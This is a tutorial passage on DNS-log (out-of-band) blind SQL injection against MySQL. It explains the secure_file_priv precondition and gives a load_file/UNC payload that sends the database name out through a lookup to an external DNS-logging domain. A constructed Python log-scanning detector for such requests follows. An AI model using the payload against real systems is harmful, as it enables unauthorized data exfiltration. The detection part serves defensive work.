Sometimes an injection gives no direct feedback, and time-based blind injection is not usable either. In such cases, you can use an out-of-band channel, meaning another protocol or channel such as HTTP requests, DNS resolution, or SMB services, to exfiltrate data. DNS log blind injection can reduce the number of requests sent and achieve injection with direct feedback.
DNS log: a record kept on the DNS server that stores domain name information, recording user access information for domains like www.xxx.com.
Conditions for utilization:
secure_file_priv in mysql.ini must be empty.
- If secure_file_priv is null, importing and exporting are not allowed.
- If secure_file_priv is set to /tmp, importing and exporting can only be done in the /tmp directory.
- When secure_file_priv is empty, there are no restrictions, and importing and exporting are allowed.
Example:
?id=1' and load_file(concat('\\', (select database()), '.27epx0.ceye.io\abc'))--+
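For detection, an added example that is not part of the original page: it scans web access-log lines for requests whose decoded query string calls load_file() together with a UNC prefix or a quoted domain suffix, as in the payload above. The log lines, the /item.php and /search paths, and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not from a real system). The second one
# carries the payload shown above, URL-encoded as a client would send it.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /item.php?id=1%27%20and%20load_file(concat(%27%5C%5C%27,%20(select%20database()),%20%27.27epx0.ceye.io%5Cabc%27))--+ HTTP/1.1" 200 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=how+to+load_file+in+mysql HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')
LOAD_FILE = re.compile(r"load_file\s*\(", re.I)
# A quoted literal starting with '.' that looks like a domain suffix: the fixed
# part that a subquery result is concatenated in front of.
SUFFIX = re.compile(r"""['"]\.((?:[a-z0-9-]+\.)+[a-z]{2,})""", re.I)
UNC = "\\\\"  # two literal backslashes, the start of a UNC path

def decode(query, rounds=3):
    """Undo URL-encoding, repeating so double-encoded input is also caught."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def scan(lines):
    """Return (client, path, callback_domain or None) per suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        query = decode(parts.query)
        if not LOAD_FILE.search(query):
            continue  # plain text mentioning load_file is not flagged
        suffix = SUFFIX.search(query)
        if suffix or UNC in query:
            findings.append((client, parts.path, suffix.group(1).lower() if suffix else None))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The domain returned with each finding can then be searched for in the resolver logs of the database host to confirm whether a lookup actually left the network.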